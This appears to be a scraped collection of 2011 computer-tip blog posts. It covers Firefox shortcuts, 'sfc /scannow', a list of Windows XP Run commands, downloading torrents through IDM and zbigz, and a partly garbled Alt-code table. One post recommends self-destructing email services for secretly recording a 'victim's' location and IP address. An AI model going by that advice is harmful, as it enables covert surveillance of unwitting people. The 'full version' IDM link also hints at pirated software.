If you want to Add and Remove buttons in Firefox Standard toolbar by clicking View Menu select Customize in Toolbar option here you can add and remove buttons. To add new button select and drag and drop where you want.


Mouse Shortcuts

Shift + Scroll down button : To go back

Middle click on the tab : To close tab

Ctrl + Scroll Up : To decrease font size

Ctrl + Scroll Down : to increase font size

Double click on tab toolbar : To load new tab

FIX all your corrupted files.

FIX all your corrupted files.


Heres' the Secret



Requirement:
Windows Operating System CD.
Steps to fix or repair Corrupt files in Windows without formatting:

*. First of all Scan your system with your updated antivirus thoroughly and ensure that all viruses and malwares are removed according to antivirus.

**. Now after scanning system, the only problem remains is corrupted files pop up messages that come because their dynamic linking has been modified by virus or due to some file deletion issues.

***. Now place your WINDOWS CD into CD/DVD drive.

****. After putting your CD. Go to Start and then open RUN.

*****. Now type the following command into RUN text field.
'sfc /scannow'
 without quotes and press enter.

******. Now it will load all your windows file and fix all your corrupted files.

How to make self destructing E-MAIL

This method is very useful for to send secret message to your friend.

How to make self destructing  E-MAIL follow the method.

Heres' the SECRET

*) First to make account on this site.

            http://www.self-destructing-email.com/

            http://www.destructingmessage.com/

           http://anonymouse.org/anonemail.html

**) After creating successfully account  and go to your regular mail account and  send mail to friend
Ex.    prasoon_nigam@yahoo.com.self-destructing-email.com  
3) At vitim side that receive message and  read message after  1 minute Email  will remove

***) Now using  self destructing service also track person location and ip who read your msg.  Go to http://www.self-destructing-email.com/

Login your account in that site. And after you will see mail you send from other email account .and open it. You will get detail
Using this technique also you can find victim exact location and service provider ip address. 

****) With http://www.destructingmessage.com/ Email will delete at certain level of time you allot time before you make an self destructive email and this works without registration

Here is a collection of 100 Commands

Monday 24 October 2011

Here is a collection of 100 Commands

That can be entered in Start>Run in Windows XP, with their functions mentioned therein. I like it. If you can remember some important ones, you can save a lot of time.

Heres' the SECRET

Go to StartMenu>RUN shortcut key (window key + R)

There you can enter these commands to get the results mentioned.
Function & Command
———————- ————————-
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
ava Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Mcft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad

How to Download Desired Torrent file with IDM!!

Saturday 8 October 2011

How to Download Desired Torrent file with IDM!!

H3r3's the Secret

STEPS:

*.* Download IDM (Internet download manager) full version :: Click on me

Second link for download IDM (Click On Me)

 *. Download the torrent file(.torrent) which you want to download...!

 **. Then just go to the website http://en.savefrom.net/ and upload the torrent file that you have just downloaded and click on the cache! button..,,!

 ***. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window..,,..!

****. Then go to the website http://zbigz.com/ and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.,.,,...!

*****. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.,.,.!!



Now enjoy the ultimate speed of IDM for downloading torrents too….:)

Alt Codes for using Keyboard Keys

Sunday 2 October 2011


Alt Codes for using Keyboard Keys.


So Heres' the secret of all 255 Keyboard Alt codes that you can use .

Alt Codes : These are the symbols that are not on keyboard but can be produced by pressing
a simple alt key along with some number of codes from Notepad.Pressing these two keys
simultaneously gives you a symbol.
Always Use Notepad to type the numbers .

In these Tables One column of Symbol and Other for the Number which give this symbol with
Pressing "Alt + " .

Steps : *. first Press 'Alt' key

 
**. By pressing this key press any number given in the list 1 to 255 , then Leave these keys . You Will get the Required Symbol

SymbolNumber
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
§21
22
23
24
25
26
27
28
29
30
31
space32
!33
"34
#35
$36
%37
&38
'39
(40
)41
*42
+43
,44
-45
.46
/47
048
149
250
351
452
553
654
755
856
957
:58
;59
<60
=61
>62
?63
@64
A65
B66
C67
D68
E69
F70
G71
H72
I73
J74
K75
L76
M77
N78
O79
P80
Q81
R82
S83
T84
U85
SymbolNumber
V86
W87
X88
Y89
Z90
[91
\92
]93
^94
_95
`96
a97
b98
c99
d100
e101
f102
g103
h104
i105
j106
k107
l108
m109
n110
o111
p112
q113
r114
s115
t116
u117
v118
w119
x120
y121
z122
{123
|124
}125
~126
127
Ç128
ü129
é130
â131
ä132
à133
å134
ç135
ê136
ë137
è138
ï139
î140
ì141
Ä142
Å143
É144
æ145
Æ146
ô147
ö148
ò149
û150
ù151
ÿ152
Ö153
Ü154
¢155
£156
¥157
158
ƒ159
á160
í161
ó162
ú163
ñ164
Ñ165
ª166
º167
¿168
169
¬170
SymbolNumber
½171
¼172
¡173
«174
»175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
α224
ß225
Γ226
π227
Σ228
σ229
µ230
τ231
Φ232
Θ233
Ω234
δ235
236
φ237
ε238
239
240
±241
242
243
244
245
÷246
247
°248
249
·250
251
252
²253
254

255